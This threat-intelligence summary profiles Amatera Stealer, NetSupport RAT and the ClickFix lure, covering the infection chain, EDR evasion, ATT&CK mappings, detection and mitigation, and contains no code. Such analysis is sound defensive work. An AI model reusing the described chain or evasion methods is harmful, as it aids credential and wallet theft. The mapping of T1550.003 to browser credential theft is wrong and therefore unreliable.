Full Report
Cybersecurity researchers have discovered malware campaigns using the now-prevalent ClickFix social engineering tactic to deploy Amatera Stealer and NetSupport RAT. The activity, observed this month, is being tracked by eSentire under the moniker EVALUSION. First spotted in June 2025, Amatera is assessed to be an evolution of ACR (short for "AcridRain") Stealer, which was available under the
Analysis Summary
# Tool/Technique: Amatera Stealer
## Overview
Amatera Stealer is a sophisticated information stealer malware, observed being deployed in the EVALUSION campaign, which uses the ClickFix social engineering tactic. It is assessed to be an evolution of the older ACR (AcridRain) Stealer and is offered as Malware-as-a-Service (MaaS). Its primary purpose is extensive data exfiltration from compromised systems.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by use of mshta.exe, PowerShell, WoW64 SysCalls, MSBuild.exe)
- Capabilities: Crypto-wallet theft, browser credential theft, messaging and FTP client data exfiltration, email service data theft, advanced evasion.
- First Seen: June 2025
## MITRE ATT&CK Mapping
*Note: Specific TTPs leverage multiple documented techniques. Mappings reflect the reported behavior.*
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1055 - Process Injection
- T1070.004 - File Deletion (Implied during cleanup/operation)
- **TA0009 - Collection**
- T1550.003 - Credential Dumping: Credentials from Web Browsers
- T1555 - Credentials from Password Stores
- **TA0011 - Command and Control**
- T1071.001 - Standard Application Layer Protocol (Used to contact C2/fetch secondary payload)
## Functionality
### Core Capabilities
- **Data Exfiltration:** Targets sensitive data including crypto-wallets, browser credentials, instant messaging application data, FTP client credentials, and email services data.
- **MaaS Model:** Available for purchase via subscription plans ranging from \$199/month to \$1,499/year.
### Advanced Features
- **Evasion Techniques:** Employs advanced techniques such as **WoW64 SysCalls** to circumvent user-mode hooking mechanisms utilized by sandboxes, Anti-Virus (AV) solutions, and Endpoint Detection and Response (EDR) products.
- **Selective Payload Delivery:** Utilizes a PowerShell check to determine if the victim machine is part of a domain or contains files of 'potential value' (e.g., crypto wallets) before downloading and executing the secondary payload (NetSupport RAT).
- **Loading Mechanism:** The malware DLL is packed using PureCrypter and injected into the **MSBuild.exe** process following initial execution.
## Indicators of Compromise
*The article provides procedural indicators rather than specific hashes or C2 addresses, focusing on the delivery mechanism.*
- File Hashes: [Not provided in the text]
- File Names: Stealer delivered as a **.NET DLL**, packed via PureCrypter.
- Registry Keys: [Not provided in the text]
- Network Indicators: Contacts an external server to download NetSupport RAT post-infection (actual domains/IPs defanged).
- Behavioral Indicators:
- Execution chain starts via **Windows Run dialog** triggered by ClickFix social engineering.
- Uses **mshta.exe** to launch an initial **PowerShell script**.
- Downloads secondary stage from **MediaFire** (file hosting service).
- Injects payload into the **MSBuild.exe** process.
## Associated Threat Actors
- Threat actors utilizing MaaS offerings (Amatera and PureCrypter). The activity cluster is tracked as **EVALUSION** by eSentire.
## Detection Methods
- Signature-based detection: Signatures targeting the characteristic packing method used by PureCrypter.
- Behavioral detection: Monitoring unusual execution chains starting from the Windows Run dialog leading to `mshta.exe` executing PowerShell, and monitoring suspicious process injection into `MSBuild.exe`. Detection of data collection patterns associated with known wallets/browsers.
- YARA rules: [Not provided in the text, but the distinct packing/injection mechanism could be signatured.]
## Mitigation Strategies
- **User Training:** Training users to recognize and avoid ClickFix social engineering lures, especially those prompting execution via the Windows Run dialog for fake verification checks.
- **Application Control:** Restricting/monitoring the execution of `mshta.exe` to spawn arbitrary scripts or PowerShell commands.
- **EDR/AV Configuration:** Ensuring EDR/AV solutions are configured not just for user-mode hooking but also utilize kernel-level monitoring to catch SysCall manipulation.
- **Privilege Separation:** Restricting user privileges to reduce the impact of successful code execution.
## Related Tools/Techniques
- **PureCrypter:** Used as the crypter/loader for the Amatera Stealer DLL.
- **NetSupport RAT:** Secondary payload deployed after initial infection assessment.
- **ACR (AcridRain) Stealer:** Predecessor/baseline for Amatera.
- **ClickFix Tactic:** The primary social engineering vector causing initial execution.
- **XWorm**, **SmartApeSG/HANEYMANEY/ZPHP** (mentioned as concurrent malware campaigns using related infection methods).
---
# Tool/Technique: NetSupport RAT
## Overview
NetSupport RAT is a Remote Access Trojan observed being deployed as a secondary payload in the EVALUSION campaign, often following a successful infection by Amatera Stealer. It provides persistent remote control capabilities to the threat actor.
## Technical Details
- Type: Malware family (RAT - Remote Access Trojan)
- Platform: Windows (implied)
- Capabilities: Full remote control, execution of further commands.
- First Seen: Mentioned in association with campaigns dating back to at least June 2025 (in this context), though NetSupport RAT is a known market tool.
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0003 - Persistence**
- (Implied, typical capability of a RAT)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Remote Command Execution:** Fetched and run via a PowerShell command invoked by Amatera Stealer.
- **Remote Access:** Provides the operator with the ability to control the compromised system.
### Advanced Features
- **Conditional Deployment:** Only deployed if the victim machine meets certain criteria (e.g., is part of a domain or contains crypto wallet files).
## Indicators of Compromise
- File Hashes: [Not provided in the text]
- File Names: [Not specified beyond being the RAT payload]
- Registry Keys: [Not provided in the text]
- Network Indicators: Communicates with the C2 infrastructure established for remote operations (C2 details not specified).
- Behavioral Indicators: Execution triggered by a post-infection PowerShell command initiated by Amatera.
## Associated Threat Actors
- Threat actors active in the EVALUSION campaign. Also associated with other observed campaigns utilizing compromised websites and malicious JavaScript redirecting to ClickFix lures.
## Detection Methods
- Detection focusing on the unusual PowerShell command structure used by Amatera to fetch this specific RAT.
- Signature-based detection for NetSupport RAT files.
- Monitoring network traffic patterns associated with the NetSupport RAT protocol.
## Mitigation Strategies
- **Network Segmentation:** Limiting lateral movement potential, especially in domains.
- **Application Control:** Restricting execution of RAT software.
- **Principle of Least Privilege:** Lowering user privileges to prevent unauthorized installation of persistent RAT components.
## Related Tools/Techniques
- **Amatera Stealer:** The initial dropper/verifier for NetSupport RAT.
- **ClickFix Tactic:** Frequently used vector in campaigns deploying this RAT (e.g., SmartApeSG campaign).
---
# Technique: ClickFix Social Engineering Tactic
## Overview
ClickFix is a prevalent social engineering tactic used to trick victims into executing malicious commands, often under the guise of completing a verification process (like reCAPTCHA or CAPTCHA). This method frequently results in the execution of PowerShell commands that download and deploy multi-stage malware payloads.
## Technical Details
- Type: Technique (Social Engineering/Initial Access)
- Platform: Windows (relies on Windows Run dialog)
- Capabilities: Deceiving users into manually executing arbitrary commands via the `Run` dialog instead of injecting exploits into web processes.
- First Seen: Mentioned in articles preceding this report (e.g., August 2025).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link (Used implicitly via decoy websites)
- **TA0002 - Execution**
- T1202 - Indirect Command Execution (User runs command manually)
- T1059.001 - Command and Scripting Interpreter: PowerShell
## Functionality
### Core Capabilities
- **User Deception:** Tricking the user into interacting with a malicious link or viewing a malicious page (e.g., fake Cloudflare Turnstile or Booking.com CAPTCHA).
- **Forced Execution:** Guiding the user to execute a specific malicious command using the Windows Run dialog (`Win+R`).
### Advanced Features
- **Multi-Stage Infection Chain:** The initial command executed often sets off a sequence involving `mshta.exe` to launch PowerShell, which fetches the main payload (e.g., Amatera Stealer distributed via MediaFire).
## Indicators of Compromise
- Behavioral Indicators: User interaction leading immediately to the execution of base64-encoded or obfuscated commands in the Windows Run dialog, often related to CAPTCHA completion links.
## Associated Threat Actors
- Actors involved in the EVALUSION campaign, SmartApeSG (HANEYMANEY/ZPHP), and various phishing campaigns involving fake invoices or booking confirmations.
## Detection Methods
- Behavioral detection: Monitoring for commands executed via the Windows Run dialog that involve spawning `mshta.exe` or heavily obfuscated PowerShell.
- Network traffic associated with the fraudulent verification/phishing sites.
## Mitigation Strategies
- **Security Awareness Training:** Crucial for educating users on suspicious verification prompts and avoiding manual command execution.
- **Restrict User Rights:** Limit the ability of standard users to execute processes like `mshta.exe` or PowerShell without appropriate context, where feasible.
- **Endpoint Hardening:** Implement controls to detect and block the launching of PowerShell scripts via unusual parent processes.
## Related Tools/Techniques
- **Amatera Stealer** and **NetSupport RAT** (Directly deployed using this technique).
- Use of **Visual Basic Script** attachments (VBS) to achieve similar command execution goals in other campaigns.